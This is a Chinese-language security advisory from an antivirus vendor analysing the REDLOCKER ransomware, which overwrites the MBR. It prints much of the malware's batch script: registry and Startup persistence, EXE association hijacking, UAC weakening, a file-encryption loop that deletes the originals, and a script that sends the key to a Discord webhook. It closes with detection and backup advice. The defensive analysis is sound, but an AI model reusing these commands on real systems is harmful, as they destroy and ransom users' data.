股票代码:688225
打开微信“扫一扫”,开启安(ān)全数字世界之旅
截图或長(cháng)按保存至相册,使用(yòng)微信扫一扫
【安(ān)全通告】破坏MBR!新(xīn)型勒索病毒REDLOCKER来袭
发布时间 :2021年03月29日
类型 :勒索软件
分(fēn)享:
近日,亚信安(ān)全网络实验室截获了一款破坏MBR的新(xīn)型勒索病毒REDLOCKER,该病毒通过网络下载感染本机,到达系统后释放两个组件,其中(zhōng)一个组件是脚本文(wén)件,其采用(yòng)RC4加密算法加密文(wén)件,并释放MBR破坏程序,导致用(yòng)户系统重启后显示黑客留下的信息,无法进入系统。另外一个文(wén)件為(wèi)工(gōng)具(jù)集,提供了RC4加密,AES加密等功能(néng),由脚本文(wén)件进行调用(yòng)。亚信安(ān)全将该勒索命名(míng)為(wèi)Ransom.Win32.REDLOCKER.YCBCQ。
攻击流程
病毒详细分(fēn)析
母體(tǐ)文(wén)件分(fēn)析
执行生成的批处理(lǐ)文(wén)件1c04.bat(该文(wén)件名(míng)為(wèi)随机命名(míng),本文(wén)以1c04.bat為(wèi)例,进行分(fēn)析):
1c04.bat文(wén)件分(fēn)析
将病毒母體(tǐ)文(wén)件变為(wèi)“只读”属性。
Attrib +R %0
将病毒母體(tǐ)添加到开机自启动。
Copy /b /y %0 “%appdata%\Microsoft\Windows\Start Menu\Programs\Startup”
结束“文(wén)件资源管理(lǐ)器”和“系统服務(wù)”。
Taskkill /im explorer.exe /f
Taskkill /im svchost.exe /f
设置注册表自启动项目。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Payload" /t REG_SZ /d "powershell.exe start -verb runas '"%0"' am_admin -WindowStyle hidden" /f>nul
建立EXE文(wén)件关联,每次双击EXE文(wén)件时都会运行此病毒母體(tǐ)文(wén)件。
REG ADD "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d "%0 %%1 %%*" /f
阻止用(yòng)户使用(yòng)“我的電(diàn)脑”来访问所选驱动器的内容。
从“我的電(diàn)脑”和Windows资源管理(lǐ)器中(zhōng)删除代表所选驱动器的图标。此外,代表所选驱动器的驱动器号也不会出现在标准“打开”对话框中(zhōng)。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewonDrive" /t REG_DWORD /d 12 /f>nul
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 12 /f>nul
生成并打开“勒索信”。
解密文(wén)件finalwords.exe 并设置开机启动。
certutil -decode finalwords.tmp finalwords.exe
schtasks /create /SC ONEVENT /RU "SYSTEM" /EC System /TN InstantKill /TR "powershell.exe start -verb runas %cd%\finalwords.exe" /RL HIGHEST /MO *[System\EventID=6005] /F>Nul
禁用(yòng)安(ān)全桌面提示;
允许执行需要提升到管理(lǐ)员的操作(zuò),而无需征得同意或凭据;
当程序尝试对计算机进行更改时,Windows 会通知用(yòng)户。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
设置键盘映射代码屏蔽按键 (左右ALT键等)。
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64 > nul调用(yòng)程序:extd.exe生成5个随机字符进行合并存入变量randomletter。
将%temp%文(wén)件夹及其子文(wén)件夹中(zhōng)的文(wén)件加上“只读”、“系统文(wén)件”和“隐藏”属性。
attrib +r +s +h /S /D %temp%
切换到用(yòng)户文(wén)件夹目录,然后枚举出此目录及其子目录指定后缀的文(wén)件列表,并保存到文(wén)件pathhost中(zhōng)。
cd /D %HOMEDRIVE%\Users\dir /s /b | findstr /I /R "db exe bat doc docx xls ppx txt css html jpg eps ppt png pdf rar avi zip raw jpeg mp3 wav wma tar epub azw ibook img ani bfc blg cat cer cfg ini part prt 1 2 3 cur cpl crl crt dat db der dll dsn ds dun fnd fng fon font hlp grp isp ins inf key lnk ink msc msi msp msstyles nfo ocx otf p7c pif pm pnf psw qds rdp reg scr sct shs sys theme tmp ttc ttf wav wmdb wme wsc wsf wsh aif aifc aiff adf amf mid mi di miz mp1 mp2 mp3 mtm ogg ogm ra rmi snd stm stz vox wax wm wma wmv ace arj bz bz2 cab gz ha lha lzh r0 tbz tbz2 tgz uu uue zoo xxe bmp bw cdt cpt cgm dcx dib emf gbr gif gih ico iff ilbm jfif jif jpe lbm mac pict pct pic pcx pix pntg psd psp qtif qti rgb rgba tga tif tiff wmf dic diz dochtml hta exc log idx pdf rtf s cp wri wtx pps ppa pothtml ppthtml dot dothtml csv dqy xl asx wvx wm ctt ymg yps asp htm htt js jse jsp mht mhtml php shtm url xml xsl eml mbx msg bin class c h cpp java jar m3u vbs spl swf c++ csharp c# ppsx ps1 shb docm odt svg webp heic">pathhost
将枚举出的文(wén)件添加“只读”、“系统文(wén)件”和“隐藏”属性。
attrib +r +s +h pathhost读取文(wén)件列表中(zhōng)的每一个文(wén)件,并使用(yòng)Base64加密,然后使用(yòng)生成的随机字符作(zuò)為(wèi)密钥,对Base64加密后的文(wén)件使用(yòng)RC4算法加密。删除加密中(zhōng)间文(wén)件。
for /f %%a in (pathhost) do (certutil -f -encode %%a %%a
%extd% /aesencode %%a %%a.a %randomletter%
%extd% /rc4 %%a %%a.aa %randomletter%
del /f /s /q %%a
del /f /s /q %%a.a)
对所有(yǒu)aa后缀结尾的文(wén)件添加“只读”属性。
attrib +r *.aa /S将密钥发送到黑客服務(wù)器。
set str=var request = new XMLHttpRequest();set str2=request.open("POST", "hxxps[:]//discord[.]com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UV yVIbp-4tehVd6_cnFln19Z4Ro5R76Ci");
set str3=request.setRequestHeader('Content-type', 'application/json');
set str4=var params = {
set str5=username: "",
set str6=avatar_url: "",
set str7=content: "%randomletter%"}
set str8=request.send(JSON.stringify(params));
echo %str%>ThreadSender.js
echo %str2%>>ThreadSender.js
echo %str3%>>ThreadSender.js
echo %str4%>>ThreadSender.js
echo %str5%>>ThreadSender.js
echo %str6%>>ThreadSender.js
echo %str7%>>ThreadSender.js
echo %str8%>>ThreadSender.js
start ThreadSender.js
finalwords.exe文(wén)件分(fēn)析
由于MBR被覆盖,系统重启后显示黑客写入的信息,系统无法正常启动。
Extd.exe文(wén)件分(fēn)析
亚信安(ān)全病毒码版本16.609.60,云病毒码版本16.609.71,全球码版本16.609.00 已经可(kě)以检测,请用(yòng)户及时升级病毒码版本;
亚信安(ān)全DDAn沙盒平台已经可(kě)以检测。
安(ān)全建议
打开系统自动更新(xīn),并检测更新(xīn)进行安(ān)装(zhuāng);
不要点击来源不明的邮件以及附件;
不要点击来源不明的邮件中(zhōng)包含的链接;
请到正规网站或者应用(yòng)商(shāng)店(diàn)下载程序;
采用(yòng)高强度的密码,避免使用(yòng)弱口令密码,并定期更换密码;
尽量关闭不必要的端口;
尽量关闭不必要的网络共享;
请注意备份重要文(wén)档。备份的最佳做法是采取3-2-1规则,即至少做三个副本,用(yòng)两种不同格式保存,并将副本放在异地存储。
分(fēn)享到微信
X